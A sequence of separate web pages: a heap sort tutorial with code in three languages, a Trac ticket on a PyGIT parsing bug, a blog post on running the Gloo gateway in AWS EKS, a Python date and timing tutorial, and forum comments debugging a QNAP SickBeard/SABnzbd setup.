- Put the second element as a left child of the root node and the third element as a right child. (Second level - 2 elements)
- Put the next two elements as children of the left node of the second level. Again, put the next two elements as children of the right node of the second level. (Third level - 4 elements)
- Keep repeating till you reach the last element.

Relationship between array indexes and tree elements
A complete binary tree has an interesting property that we can use to find the children and parent of any node. If the index of any element in the array is i, the element at index 2i+1 will become the left child and the element at index 2i+2 will become the right child.
Also, the parent of any element at index i is given by the lower bound of (i-1)/2.

Let's test it out:
Left child of 1 (index 0) = element at index (2*0+1) = element at index 1 = 12
Right child of 1 = element at index (2*0+2) = element at index 2 = 9

Similarly,
Left child of 12 (index 1) = element at index (2*1+1) = element at index 3 = 5
Right child of 12 = element at index (2*1+2) = element at index 4 = 6

Let us also confirm that the rule holds for finding the parent of any node:
Parent of 9 (position 2) = (2-1)/2 = ½ = 0.5 ~ index 0 = 1
Parent of 12 (position 1) = (1-1)/2 = index 0 = 1

Understanding this mapping of array indexes to tree positions is critical to understanding how the Heap Data Structure works and how it is used to implement Heap Sort.

What is a Heap Data Structure?

A heap is a special tree-based data structure. A binary tree is said to follow a heap data structure if
- it is a complete binary tree
- all nodes in the tree follow the property that they are greater than their children, i.e. the largest element is at the root, both its children are smaller than the root, and so on. Such a heap is called a max-heap. If instead all nodes are smaller than their children, it is called a min-heap.

The following example diagram shows a Max-Heap and a Min-Heap.

How to "heapify" a tree

Starting from a complete binary tree, we can modify it to become a Max-Heap by running a function called heapify on all the non-leaf elements of the heap. Since heapify uses recursion, it can be difficult to grasp, so let's first think about how you would heapify a tree with just three elements:

heapify(array)
    Root = array[0]
    Largest = largest(array[0], array[2*0 + 1], array[2*0 + 2])
    if (Root != Largest)
        Swap(Root, Largest)

The example above shows two scenarios: one in which the root is the largest element and we don't need to do anything, and another in which the root had a larger element as a child and we needed to swap to maintain the max-heap property.
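The index arithmetic above is easy to sanity-check with a few lines of Python, using the same array of values, [1, 12, 9, 5, 6, 10], that the worked examples refer to:

```python
# The array from the worked example above, viewed as a complete binary tree.
arr = [1, 12, 9, 5, 6, 10]

def left(i):
    return 2 * i + 1        # index of the left child

def right(i):
    return 2 * i + 2        # index of the right child

def parent(i):
    return (i - 1) // 2     # floor division = "lower bound" of (i-1)/2

print(arr[left(0)], arr[right(0)])     # children of 1  -> 12 9
print(arr[left(1)], arr[right(1)])     # children of 12 -> 5 6
print(arr[parent(2)], arr[parent(1)])  # parent of 9 and of 12 -> 1 1
```

The same three helper functions work for a complete binary tree of any size, which is exactly why the heap can live in a flat array with no pointers.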
If you've worked with recursive algorithms before, you've probably identified that this must be the base case.

Now let's think of another scenario with more than one level. The top element isn't a max-heap, but all the sub-trees are max-heaps. To maintain the max-heap property for the entire tree, we will have to keep pushing 2 downwards until it reaches its correct position. Thus, to maintain the max-heap property in a tree where both sub-trees are max-heaps, we need to run heapify on the root element repeatedly until it is larger than its children or it becomes a leaf node. We can combine both these conditions in one heapify function as

void heapify(int arr[], int n, int i) {
    int largest = i;
    int l = 2*i + 1;
    int r = 2*i + 2;

    if (l < n && arr[l] > arr[largest])
        largest = l;

    if (r < n && arr[r] > arr[largest])
        largest = r;

    if (largest != i) {
        swap(arr[i], arr[largest]);

        // Recursively heapify the affected sub-tree
        heapify(arr, n, largest);
    }
}

This function works both for the base case and for a tree of any size. We can thus move the root element to the correct position to maintain the max-heap status for any tree size as long as the sub-trees are max-heaps.

Build max-heap

To build a max-heap from any tree, we can thus start heapifying each sub-tree from the bottom up and end up with a max-heap after the function is applied to all the elements, including the root element. In the case of a complete tree, the first index of a non-leaf node is given by n/2 - 1. All other nodes after that are leaf nodes and thus don't need to be heapified. So, we can build a maximum heap as

// Build heap (rearrange array)
for (int i = n / 2 - 1; i >= 0; i--)
    heapify(arr, n, i);

As shown in the above diagram, we start by heapifying the lowest (smallest) trees and gradually move up until we reach the root element. If you've understood everything till here, congratulations, you are on your way to mastering Heap Sort.
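Sketched in Python (a direct transcription of the two C snippets above, applied to this article's example values), the bottom-up build looks like this:

```python
def heapify(arr, n, i):
    # Find largest among root, left child and right child
    largest = i
    l = 2 * i + 1
    r = 2 * i + 2
    if l < n and arr[l] > arr[largest]:
        largest = l
    if r < n and arr[r] > arr[largest]:
        largest = r
    # Swap and continue heapifying if root is not largest
    if largest != i:
        arr[i], arr[largest] = arr[largest], arr[i]
        heapify(arr, n, largest)

arr = [1, 12, 9, 5, 6, 10]
n = len(arr)
# Build heap: heapify every non-leaf node, bottom up
for i in range(n // 2 - 1, -1, -1):
    heapify(arr, n, i)

print(arr)  # [12, 6, 10, 5, 1, 9] -> the root now holds the largest element
```

Note that the result is a valid max-heap (every parent is at least as large as its children) but not a sorted array; sorting is the separate extraction step described next.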
Procedures to follow for Heapsort
- Since the tree satisfies the max-heap property, the largest item is stored at the root node.
- Remove the root element and put it at the end of the array (nth position). Put the last item of the tree (heap) at the vacant place.
- Reduce the size of the heap by 1 and heapify the root element again so that we have the highest element at the root.
- The process is repeated until all the items of the list are sorted.

The code below shows the operation.

for (int i = n - 1; i >= 0; i--) {
    // Move current root to end
    swap(arr[0], arr[i]);

    // call max heapify on the reduced heap
    heapify(arr, i, 0);
}

Performance

Heap Sort has O(nlogn) time complexity for all the cases (best case, average case and worst case). Let us understand why.

The height of a complete binary tree containing n elements is log(n). As we have seen earlier, to fully heapify an element whose subtrees are already max-heaps, we need to keep comparing the element with its left and right children and pushing it downwards until it reaches a point where both its children are smaller than it. In the worst case scenario, we will need to move an element from the root to the leaf node, making a multiple of log(n) comparisons and swaps. During the build_max_heap stage, we do that for n/2 elements, so the worst case complexity of the build_heap step is n/2*log(n) ~ nlogn.

During the sorting step, we exchange the root element with the last element and heapify the root element. For each element, this again takes log(n) worst-case time because we might have to bring the element all the way from the root to the leaf. Since we repeat this n times, the heap_sort step is also nlogn. Also, since the build_max_heap and heap_sort steps are executed one after another, the algorithmic complexity is not multiplied and it remains in the order of nlogn.

Heap Sort also performs sorting in O(1) space complexity. Compared with Quick Sort, it has a better worst case ( O(nlogn) ).
Quick Sort has complexity O(n^2) in the worst case, but in other cases Quick Sort is fast. Introsort is an alternative to heapsort that combines quicksort and heapsort to retain the advantages of both: the worst-case speed of heapsort and the average speed of quicksort.

Application of Heap Sort

Systems concerned with security, and embedded systems such as the Linux kernel, use Heap Sort because of the O(n log n) upper bound on Heapsort's running time and the constant O(1) upper bound on its auxiliary storage. Although Heap Sort has O(n log n) time complexity even in the worst case, it doesn't have many applications (compared to other sorting algorithms like Quick Sort and Merge Sort). However, its underlying data structure, the heap, can be used efficiently if we want to extract the smallest (or largest) item from a list without the overhead of keeping the remaining items in sorted order, e.g. in priority queues.

Heap Sort Implementation in different Programming Languages

C++ Implementation

// C++ program for implementation of Heap Sort
#include <iostream>
using namespace std;

void heapify(int arr[], int n, int i) {
    // Find largest among root, left child and right child
    int largest = i;
    int l = 2*i + 1;
    int r = 2*i + 2;

    if (l < n && arr[l] > arr[largest])
        largest = l;

    if (r < n && arr[r] > arr[largest])
        largest = r;

    // Swap and continue heapifying if root is not largest
    if (largest != i) {
        swap(arr[i], arr[largest]);
        heapify(arr, n, largest);
    }
}

// main function to do heap sort
void heapSort(int arr[], int n) {
    // Build max heap
    for (int i = n / 2 - 1; i >= 0; i--)
        heapify(arr, n, i);

    // Heap sort
    for (int i = n - 1; i >= 0; i--) {
        swap(arr[0], arr[i]);

        // Heapify root element to get highest element at root again
        heapify(arr, i, 0);
    }
}

void printArray(int arr[], int n) {
    for (int i = 0; i < n; ++i)
        cout << arr[i] << " ";
    cout << "\n";
}

int main() {
    int arr[] = {1, 12, 9, 5, 6, 10};
    int n = sizeof(arr) / sizeof(arr[0]);

    heapSort(arr, n);

    cout << "Sorted array is \n";
    printArray(arr, n);
}

Java program
for implementation of Heap Sort

// Java program for implementation of Heap Sort
public class HeapSort {
    public void sort(int arr[]) {
        int n = arr.length;

        // Build max heap
        for (int i = n / 2 - 1; i >= 0; i--) {
            heapify(arr, n, i);
        }

        // Heap sort
        for (int i = n - 1; i >= 0; i--) {
            int temp = arr[0];
            arr[0] = arr[i];
            arr[i] = temp;

            // Heapify root element
            heapify(arr, i, 0);
        }
    }

    void heapify(int arr[], int n, int i) {
        // Find largest among root, left child and right child
        int largest = i;
        int l = 2*i + 1;
        int r = 2*i + 2;

        if (l < n && arr[l] > arr[largest])
            largest = l;

        if (r < n && arr[r] > arr[largest])
            largest = r;

        // Swap and continue heapifying if root is not largest
        if (largest != i) {
            int swap = arr[i];
            arr[i] = arr[largest];
            arr[largest] = swap;
            heapify(arr, n, largest);
        }
    }

    static void printArray(int arr[]) {
        int n = arr.length;
        for (int i = 0; i < n; ++i)
            System.out.print(arr[i] + " ");
        System.out.println();
    }

    public static void main(String args[]) {
        int arr[] = {1, 12, 9, 5, 6, 10};
        HeapSort hs = new HeapSort();
        hs.sort(arr);
        System.out.println("Sorted array is");
        printArray(arr);
    }
}

Python program for implementation of heap sort (Python 3)

def heapify(arr, n, i):
    # Find largest among root and children
    largest = i
    l = 2 * i + 1
    r = 2 * i + 2

    if l < n and arr[i] < arr[l]:
        largest = l

    if r < n and arr[largest] < arr[r]:
        largest = r

    # If root is not largest, swap with largest and continue heapifying
    if largest != i:
        arr[i], arr[largest] = arr[largest], arr[i]
        heapify(arr, n, largest)

def heapSort(arr):
    n = len(arr)

    # Build max heap (n // 2 - 1 is the last non-leaf node)
    for i in range(n // 2 - 1, -1, -1):
        heapify(arr, n, i)

    for i in range(n - 1, 0, -1):
        # swap
        arr[i], arr[0] = arr[0], arr[i]

        # heapify root element
        heapify(arr, i, 0)

arr = [12, 11, 13, 5, 6, 7]
heapSort(arr)
n = len(arr)
print("Sorted array is")
for i in range(n):
    print("%d" % arr[i])
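As an aside to the priority-queue application mentioned above: you rarely need to hand-roll a heap in Python, since the standard heapq module maintains a list as a min-heap and lets you extract the smallest item without sorting everything:

```python
import heapq

items = [12, 11, 13, 5, 6, 7]
heapq.heapify(items)         # rearrange the list in place into a min-heap, O(n)

print(heapq.heappop(items))  # 5 -- smallest item, O(log n) per pop
print(heapq.heappop(items))  # 6
print(items[0])              # 7 -- the rest is still a heap, not fully sorted
```

This is exactly the "extract the smallest without keeping the rest sorted" trade-off described earlier, which is why heaps back priority queues.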
https://www.programiz.com/dsa/heap-sort
Opened 7 years ago
Closed 3 years ago

#8639 closed defect (wontfix)

PyGIT._get_branches fails with ValueError on commit messages with line feeds

Description (last modified by )

I have a commit here that includes a subject line that includes ^M characters. This will cause _get_branches to fail when trying to unpack the malformed lines resulting from splitting on linefeed boundaries. Here is a proposed fast solution that will replace all ^M characters so that retrieving the branch information does not fail:

def _get_branches(self):
    "returns list of (local) branches, with active (= HEAD) one being the first item"
    result = []
    for e in self.repo.branch("-v", "--no-abbrev").replace('\r', '/CTRL-R').splitlines():
        bname, bsha = e[1:].strip().split()[:2]
        if e.startswith('*'):
            result.insert(0, (bname, bsha))
        else:
            result.append((bname, bsha))
    return result

Attachments (0)

Change History (2)

comment:1 Changed 7 years ago by

comment:2 Changed 3 years ago by

GitPlugin is deprecated. Please upgrade to Trac 1.0 and use TracGit.
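To see why the patch is needed: str.splitlines() treats a carriage return as a line boundary, so a subject containing one is split into fragments with too few fields to unpack. A small self-contained sketch (simulated branch output; the HEAD-reordering of the real method is omitted for brevity):

```python
# Simulated `git branch -v --no-abbrev` output; the first commit
# subject contains a stray carriage return (^M).
raw = ("* master 0123456 Fix\rbug\n"
       "  devel 89abcde ok\n")

def parse(text):
    result = []
    for e in text.splitlines():
        # fails with ValueError on the "bug" fragment: only one field
        bname, bsha = e[1:].strip().split()[:2]
        result.append((bname, bsha))
    return result

try:
    parse(raw)
except ValueError as err:
    print("unpatched:", err)

# The proposed fix: neutralize \r before splitting into lines.
print(parse(raw.replace('\r', '/CTRL-R')))
# [('master', '0123456'), ('devel', '89abcde')]
```

The replacement string itself is arbitrary; what matters is that no \r survives to create extra pseudo-lines.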
https://trac-hacks.org/ticket/8639
and start exposing and integrating APIs and services to your clients and other parts of your organization. At Solo.io we've open-sourced a microservices gateway built on top of Envoy Proxy named Gloo. Gloo is a platform-agnostic control plane for Envoy purposefully built to understand "function" level calls (think combination of HTTP path/method/headers, gRPC calls, or Lambda functions) for the purposes of composing them and building richer APIs for both north-south AND east-west traffic. Gloo is also highly complementary to service-mesh technology like Istio. Gloo's functionality includes:

- Function routing (REST methods, gRPC endpoints, Lambda/Cloud Functions)
- Fine-grained traffic shifting (function canary, function weighted routing, etc.)
- Request/content transformations (implicit and explicit)
- Authorization / Authentication
- Rate limiting
- gRPC
- WebSockets
- SOAP / WSDL
- Deep metrics collection
- GraphQL Engine for aggregate data APIs
- Powerful platform-agnostic discovery mechanisms

Gloo has very deep Kubernetes-native support and can be run as a cluster ingress for your Kubernetes cluster. As a side note, for some much-needed clarification on Ingress, API Gateway, API Management (and even service mesh), take a look at the blog post "API Gateways are going through an identity crisis".

In helping folks use Gloo in AWS EKS, we've had to navigate the fairly complex choices for exposing services running in Kubernetes. These options will be the same for other Kubernetes-native ingress, API, or function gateways. Since AWS EKS is Kubernetes, we could expose a microservices/API gateway like Gloo in the following ways:

- a Kubernetes Ingress Resource
- a Kubernetes Service with type LoadBalancer
- a Kubernetes Service as a NodePort (not recommended for production)

On Gloo, we are also working on native OpenShift support and should have it shortly.
In the meantime, if you're running workloads on AWS EKS, you may have questions about how to leverage a microservices gateway, or whether you should just use the managed AWS API Gateway. Let's explore the options here.

Using AWS API Gateway with your EKS cluster

AWS EKS is really a managed control plane for Kubernetes, and you run your worker nodes yourself. A typical setup is to have your worker nodes (EC2 hosts) in a private VPC, using all of the built-in VPC isolation, security groups, IAM policies, etc. Once you start deploying workloads/microservices to your Kubernetes cluster, you may wish to expose them and/or provide a nicely decoupled API to your clients, customers, partners, etc. Your first question is probably along the lines of "well, since I'm using AWS, it should just be super easy to use the AWS API Gateway in front of my Kubernetes cluster". As you start to dig, you realize it's not exactly that straightforward to connect AWS API Gateway to your EKS cluster. What you find is that AWS API Gateway runs in its own VPC and is completely managed, so you cannot see any details about its infrastructure. Luckily, with AWS API Gateway you can use "Private Integrations" to connect to HTTP endpoints running in your own VPC. Private Integrations allow you to expose a Network Load Balancer (NLB) in your private VPC which can terminate traffic for your API Gateway-to-VPC integration. So basically the AWS API Gateway would create a VpcLink to an NLB running in your VPC. So that's great! The Network Load Balancer is a very powerful load balancer, but even though it runs inside your VPC, it doesn't know about or understand the workloads running in your Kubernetes cluster (i.e., Kubernetes Pods). Let's change this. At this point we need to deploy some kind of Kubernetes ingress endpoint which understands how to route to Pods.
Some folks might tend to favor using the native Kubernetes Ingress resource at this point, or you really could just use a single Kubernetes service exposed as a "LoadBalancer". In fact, we can take this a step further. The default load balancer created when you specify LoadBalancer in a Kubernetes Service in EKS is a classic load balancer. The problem with this is the API Gateway cannot route to a classic load balancer. We need the Kubernetes service running inside EKS to create a network load balancer. For example, this configuration would create a classic load balancer:

apiVersion: v1
kind: Service
metadata:
  name: gloo
  namespace: default
  annotations: {}
spec:
  ports:
  - name: http
    port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: gloo
  type: LoadBalancer

Adding the annotation service.beta.kubernetes.io/aws-load-balancer-type: "nlb" will cause AWS to create a network load balancer when we create this service in EKS:

apiVersion: v1
kind: Service
metadata:
  name: gloo
  namespace: default
  labels:
    app: gloo
  annotations:
    service.beta.kubernetes.io/aws-load-balancer-type: "nlb"
spec:
  externalTrafficPolicy: Local
  ports:
  - name: http
    port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: gloo
  type: LoadBalancer

At this point, we have the correct combination of load balancer (NLB in private VPC) and AWS API Gateway configured correctly. We can even have AWS Web Application Firewall (WAF) enabled on the AWS API Gateway. The only problem is, we have the power (and cost) of the AWS API Gateway at the edge, but it still doesn't understand the workloads we have running within the Kubernetes cluster. When we want to do things like canary releases, API aggregation, function routing and content transformation, we need to do that within the Kubernetes cluster. Gloo solves for that.

So do you really need API Gateway -> NLB -> API Gateway?
In this case, you could just promote your network load balancer to a public subnet, let Gloo handle all of the API Gateway routing, traffic shaping, and rate limiting, and not lose any of the functionality of the AWS API Gateway (Lambda routing, AuthZ/N, WebSockets, etc.).

Alternative setups

We started the previous section with the assumption that an AWS API Gateway would be simpler to integrate with our Kubernetes cluster when using EKS than an alternative solution. We found that's not the case. We do have other options, however. If you're using EKS, you'll need some sort of API gateway or microservices gateway that runs within Kubernetes. But how do we get traffic to our EKS cluster? And what if we want to take advantage of things like the AWS Web Application Firewall (WAF)? The options we have, given the various types of load balancers and the tradeoffs of running a microservices/API gateway in AWS EKS, come down to the following:

AWS API Gateway + private VPC NLB + simple Kubernetes Ingress

This is similar to the previous section, but instead of using a powerful microservices gateway like Gloo, you opt for a basic ingress controller in Kubernetes. In this case you leverage the AWS API Gateway and get nice things like the AWS Web Application Firewall, but you lose the fidelity of workloads running in EKS (pods).

AWS API Gateway + private VPC NLB + powerful Kubernetes microservices gateway like Gloo

This is the use case from the previous section. Now you've gained the power of a microservices gateway closer to the workloads in EKS, but you've got a redundant and expensive gateway at your edge. The benefit here is you can still take advantage of the AWS Web Application Firewall (WAF).

Public NLB + powerful Kubernetes microservices gateway like Gloo

In this case, we've eschewed the AWS API Gateway and are just using a network load balancer sitting in a public subnet.
All of the power of the microservices/API gateway now sits close to your workloads in EKS, but you lose the Web Application Firewall (it cannot be applied to an NLB). If you have your own WAF you're using, this may not be a bad tradeoff.

Public ALB + private NLB + powerful Kubernetes microservices gateway like Gloo

You can more finely control public-facing network requests with an Application Load Balancer (to which you can apply AWS WAF) and still keep your EKS traffic private and controlled through a private NLB. With this approach you can also centrally manage all of your TLS certificates through CloudFormation.

Public ALB managed as a Kubernetes Ingress Controller + Kubernetes API Gateway private to the Kubernetes cluster

You can use the Kubernetes Ingress with Application Load Balancer third-party plugin to manage your ALB in Kubernetes. At this point you can run your API Gateway locally and privately within your EKS cluster and still take advantage of WAF, because we're using an ALB. The downside is that this functionality is provided by a third-party plugin and you cannot centrally manage your certificates with CloudFormation. That is, you have to use the Ingress annotations to manage them.

Conclusion

There are a handful of options for running your microservices/API gateway in AWS EKS. Each combination comes with tradeoffs and should be carefully considered. We built Gloo specifically to be a powerful cross-platform, cross-cloud microservices API gateway. This means you have even more options when running on AWS, on premises, or any other cloud. Each organization will have its unique constraints, opinions, and options. We believe there are good options to make a monolith-to-microservices or on-premises hybrid deployment to public cloud a success. If you have an alternative suggestion for this use case, please reach out to me @christianposta on Twitter or in the comments of this blog.
https://www.javacodegeeks.com/2019/02/exposing-running-microservices.html
Accessing date and time

It may sometimes be useful to access the current date and/or time. As an example, when writing code it may be useful to access the time at particular stages to monitor how long different parts of the code are taking. To access date and time we will use the datetime module (which is held in a package that is also, a little confusingly, called datetime!):

from datetime import datetime

To access the current date and time we can use the now method:

print(datetime.now())

OUT:
2018-03-28 08:54:13.623198

You might not have expected to get the time to the nearest microsecond! But that may be useful at times when timing short bits of code (which may have to run many times). But we can access the date and time in different ways:

current_datetime = datetime.now()
print('Date:', current_datetime.date())  # note the () after date
print('Year:', current_datetime.year)
print('Month:', current_datetime.month)
print('Day:', current_datetime.day)
print('Time:', current_datetime.time())  # note the () after time
print('Hour:', current_datetime.hour)
print('Minute:', current_datetime.minute)
print('Second:', current_datetime.second)

OUT:
Date: 2018-03-28
Year: 2018
Month: 3
Day: 28
Time: 08:54:13.636654
Hour: 8
Minute: 54
Second: 13

Having microseconds in the time may look a little clumsy, so let's format the date and time using the strftime method:

now = datetime.now()
print(now.strftime('%Y-%m-%d'))
print(now.strftime('%H:%M:%S'))

OUT:
2018-03-28
08:54:13

Timing code

We can use datetime to record the time before and after some code to calculate the time taken, but it is a little simpler to use the time module, which keeps all time in seconds (from January 1st 1970) and gives even more accuracy:

import time

time_start = time.time()
for i in range(100000):
    x = i ** 2
time_end = time.time()
time_taken = time_end - time_start
print('Time taken:', time_taken)

OUT:
Time taken: 0.03149104118347168
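As a side note, on Python 3.3 and later the time module also offers perf_counter(), which is generally preferred over time.time() for timing code: it uses the highest-resolution clock available and is not affected by system clock adjustments. The example above becomes:

```python
import time

time_start = time.perf_counter()
for i in range(100000):
    x = i ** 2
time_end = time.perf_counter()

print('Time taken:', time_end - time_start)
```

The value returned by perf_counter() has no meaning on its own (it is not seconds since 1970); only the difference between two calls is meaningful.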
https://pythonhealthcare.org/2018/03/28/19-accessing-date-and-time-and-timing-code/
Super Charge your XBMC(KODI)/HTPC Setup with fully automated download of TV Episodes … QNAP (I use the QNAP TS-869 Pro) makes some very flexible NAS devices, with expandable functionality by means of so-called QPKG install packages. But QPKGs are not only created by QNAP; quite a few volunteers seeking specific new functions for their beloved QNAP NAS create QPKGs as well. One of these functions is adding Sick Beard and SABnzbd, which adds the option to automatically retrieve TV series episodes that become available in newsgroups. It does not only retrieve the files, it also finds new episodes, relevant metadata, etc …

Fantastic article, had everything up and running after an hour or so. The only issue I have atm is with the post processing: the files seem to remain in the SABnzbd Complete directory. They are not moved to Qnap … /Multimedia/TVSeries; any suggestions?
Dazcon5

Thanks Dazcon5! Seems our post processing script is not running for some reason.
Check in SABnzbd: Folders -> User Folders -> Post-Processing Scripts Folder (mine says: /share/MD0_DATA/.qpkg/SickBeard/autoProcessTV)
Check in SABnzbd: Categories -> your category -> sabToSickBeard.py (where your category is your TV Series category)
You can find the category also in SickBeard: Config -> Search Settings -> NZB Search -> SABnzbd Category, and it should match your category.
Check /share/MD0_DATA/.qpkg/SickBeard/autoProcessTV/autoProcessTV.cfg, it should have something like this:
Let me know if verifying these settings helped.
hans

Great article. I had Sickbeard/Sabnzbd set up previously on a Windows Home Server, though I bit the bullet and put this on my QNAP 869.
Everything works great, though I have one glitch: the post-processing script appears to be timing out in SABnzbd and not completing successfully, i.e. I see "running script: sabToSickbeard.py" and then after a long wait (10 minutes or so) I see the error: "Exit(1) socket error: [Errno 104] Connection reset by peer (More)". Clicking on the error details I get:

Opening URL:
Traceback (most recent call last):
  File "/share/MD0_DATA/.qpkg/SickBeard/autoProcessTV/sabToSickBeard.py", line 29, in <module>
    autoProcessTV.processEpisode(sys.argv[1], sys.argv[2])
  File "/share/MD0_DATA/.qpkg/SickBeard/autoProcessTV/autoProcessTV.py", line 101, in processEpisode
    result = urlObj.readlines()
  File "/share/MD0_DATA/.qpkg/Python/lib/python2.7/socket.py", line 513, in readlines
    line = self.readline()
  File "/share/MD0_DATA/.qpkg/Python/lib/python2.7/socket.py", line 428, in readline
    data = recv(1)
socket.error: [Errno 104] Connection reset by peer

Note: I have the metadata enabled and am using custom directories. The show is being parsed and moved to the tvseries directory fine (incl. renamed), though the metadata is not there. Disabling the fetch of all the metadata in SickBeard did not help. I've gone through all the steps again rigorously, though still the same issue. Any ideas, or how to debug the python script live? ;-)
Thanks
Zed

I've not seen that problem before … After some searching, a few things that might be the cause of this:
Check your autoProcessTV.cfg details like passwords etc … but I'm confident that you already did all this.
Disabling the use of SSL has been suggested elsewhere, but that didn't make sense to me considering your situation. It does remind me though of some issues I encountered when I used SSL to access the QNAP admin pages.
Is your Sickbeard or SABnzbd (on your QNAP) accessed through https? What happens when you enter http://<qnap-ip>:9091? Or do you use https://<qnap-ip>:9091?
hans
Debugging the .py script there was an ssl variable which determined whether the link used was http or https… this pointed me back to the autoProcessTV.cfg file. Adding the line “ssl=1” (without quotes) got things going – after restarting both Sickbeard and SABnzbdb – and all works nicely now! :) Disabling SSL on SB would have worked, though I access remotely, so wanted SSL ;-). Thanks again for the informative guide here. Cheers! Zed Awesome Zed! Glad to hear that, and thanks for posting the solution here! hans Thanks, you guys are good, @hans I think I jumped in to quick when I posted last time, the following afternoon I checked again for the tips you gave me but when I looked at the directories everything was up and working ! dazcon5 No problem Dazcon5! You’re most welcome … hans Fantastic Info, I had a windows machine doing this until now. I have followed the instructions but I am getting the following output from the script. Traceback (most recent call last): File “/share/CACHEDEV1_DATA/.qpkg/SickBeard/autoProcessTV/sabToSickBeard.py”, line 23, in <module> import autoProcessTV File “/share/CACHEDEV1_DATA/.qpkg/SickBeard/autoProcessTV/autoProcessTV.py”, line 23, in <module> import ConfigParserImportError: No module named ConfigParser I cant for the life of me figure out where I have went wrong, any ideas ? Kind Regards Brian Boston I just checked, and it could be that you are not running Phyton 2.7, and instead be using a newer Phyton version – in newer versions ConfigParser is no longer capitalized (so it’s spelled: configparser). In my SickBeard file ConfigParser is spelled the same as in your. If you type from an SSH shell just “phyton” followed by pressing ENTER, the version number should display (CTRL+D to exit). Since Sickbeard assumes Phyton 2.5 – 2.7, make sure your setup is not running 3.x …. I also assume you’ve installed OptWare before installing SickBeard. If not: remove SickBeard, install OptWare and re-install SickBeard. 
Through OptWare you can install Phyton 2.7 if needed. The link should be something like this: In this list Phyton 2.7 should appear – if it wasn’t installed – and you can simply click “install” there. Since I haven’t ran into this issue, this would be my first guess … hans Hi Hans, Thanks for your help, after running the command it tells me I have Python 2.7.3. I also installed the latest OptWare and Python before installing sick beard. Brian Boston Seems you have the right Phyton version (I’m running Python 2.7). Probably not relevant but your .qpkg path is definitly different than mine. You have: On my 869 it is: And I do not have the CACHEDEV1_DATA …. the name makes me wonder … Another common mistake seems to be (after Googling it again): Did you create a “autoprocessTV.cfg” file? (ie. rename the .SAMPLE file) hans Hi, yes i have edited the .cfg file with the correct port and other info. I am on version 4.1 firmware which on my model changes the storage manager to a newer version and some of the directory structure, I am starting to think this is something to do with it. I have had chance to check the same cofig / settings out on a ts-559 even though it is on the same 4.1 firmware it maintains the older storage manager and directory structure and it works fine. brian boston I’m running the latest stable version (4.0.3 on a TS869) and that does not seem to change the storage manager. …. You could be right that this might cause this, but I have no means to verify that Thanks for the heads up though: I won’t be upgrading to 4.1 until others have determined it to not causing issues … hans I am also having this problem. Did you find a solution? I am running QNAP TS-269L with 4.1 firmware. I installed OptWare and Python before Sickbeard and I have confirmed I am using 2.7.3-1 Neal Hi Neal, I have no means to mimics the setup (running 4.0.3, and not very eager to see the directory structure change), maybe Brian can let us know if he managed to find a solution or not? 
hans

Yeah, I was hoping Brian would respond with anything he has found. It is interesting to have this error. I had to rebuild my QNAP NAS as I mucked up the share permissions with Windows ACL, so I had to start again. So I rebuilt it from factory defaults. I was already running the latest 4.1 software and it was working fine. The only difference is that I moved from a mirrored RAID-1 to (non-mirrored) RAID-0 (as I now have an external USB drive using rsync for important files to keep another backup). Apart from that, no other changes in system configuration. I tried a couple of attempts to fix the issue, as I believe it has something to do with the Python version (or maybe access to the Python libraries – could be a path issue, as previously, using mirrored RAID-1, my path was share/MD0_DATA and now it is share/CACHEDEV1_DATA). I uninstalled all apps and OptWare and Python. I then tried to manually install them, and I had a strange issue that SickBeard required v2.6 of Python and wasn’t liking just v2.7. So I uninstalled them and used the QNAP facility to install OptWare, Python etc. I had to use OptWare to install Python 2.6 and checked to ensure that Python 3.0 was not installed. Once this was done, everything was working again… but unfortunately the same issue is still there, where it says:

import ConfigParser
ImportError: No module named ConfigParser

All scripts are ‘standard’ and nothing altered except for autoProcessTV.cfg to set my username/password. I have done lots of Google searches with no luck. As Brian has recently done this I can see he had the issue, as do I, which is a result of a recent re-build. However, as I said previously, it all worked. My only idea is that it has to do with the change in path and the SickBeard scripts failing to locate the Python libraries…. Next step for me is to try and find any hardcoding of the path for MD0_DATA, potentially in SickBeard?? Or should I look at SABnzbd, as this is calling these scripts?
Neal

Since I’m not running into this issue, helping can be a challenge, so I’ll just throw a few ideas out there – some of them probably already checked by either of you …

1) In “/etc/config/qpkg.conf” I found (note the Shell and Install paths) – especially the Install_Path seems to be called often in sickbeard.sh:

2) In “sickbeard.sh” (in the SickBeard qpkg dir) – check the DAEMON parameters; it seems to be very specific about Python 2.7 (although the code states that 2.5, 2.6 or 2.7 will work):

It baffles me that you two appear to be the only ones in this universe that run into this problem – which seems unlikely to me. Anything I found related to this error message basically says: wrong Python version, or reinstall SickBeard (the latter being a bit of a lame answer). I’m not sure how many people run QTS 4.1 … hans

I have the exact same issue here. Poking around I noticed that sabnzbd.sh is using python2.6 (I am using 130927 by Clinton Hall); there are comments about updating it to python2.7. I have tried both nzbToMedia.py and sabToSickbeard.py with exactly the same issue, ConfigParser not found. I can manually run sabToSickbeard.py without issue, however. That leads me to believe this is some kind of pathing/environment issue with how SABnzbd is launched. I am also running 4.1beta on a TS-870pro (Intel proc). I will muck around with sabnzbd.sh to see if I can get it to find the correct path within the SABnzbd context and let you know …. darkkith

@darkkith; Maybe we should compare some environment variables with QTS < 4.1? Seems this problem ONLY happens with QTS 4.1. hans

@hans you are probably correct that this problem seems to occur only with 4.1. I am not really sure where to start on comparing environment variables. When I manually run the script it functions; however, when SABnzbd launches the script it exits prematurely.
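One way to compare the two launch contexts (an SSH shell versus a script started by SABnzbd) is to have the script dump its interpreter version, sys.path, and environment variables to a file, then diff the two dumps. A stdlib-only sketch; the file name and location are just examples:

```python
# Dump the interpreter's version, module search path, and environment
# to a file, so two launch contexts can be compared with diff.
import os
import sys
import tempfile

def dump_env(path):
    with open(path, "w") as fh:
        fh.write("python: %s\n" % sys.version.split()[0])
        fh.write("sys.path:\n")
        for entry in sys.path:
            fh.write("  %s\n" % entry)
        fh.write("environment:\n")
        for key in sorted(os.environ):
            fh.write("  %s=%s\n" % (key, os.environ[key]))

if __name__ == "__main__":
    dump_env(os.path.join(tempfile.gettempdir(), "pyenv-dump.txt"))
```

Calling this once from an SSH shell and once from SABnzbd's post-processing hook (writing to two different files) would show immediately whether PATH, PYTHONPATH, or sys.path differ between the contexts.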
The error I see in SABnzbd is: autoProcessTV.py starts with this: I was able to find “urllib.py” and “os.path.py” in the same location “ConfigParser.py” exists (/opt/lib/python2.6; it’s also in /opt/lib/python2.7 but I don’t think that’s really relevant). darkkith

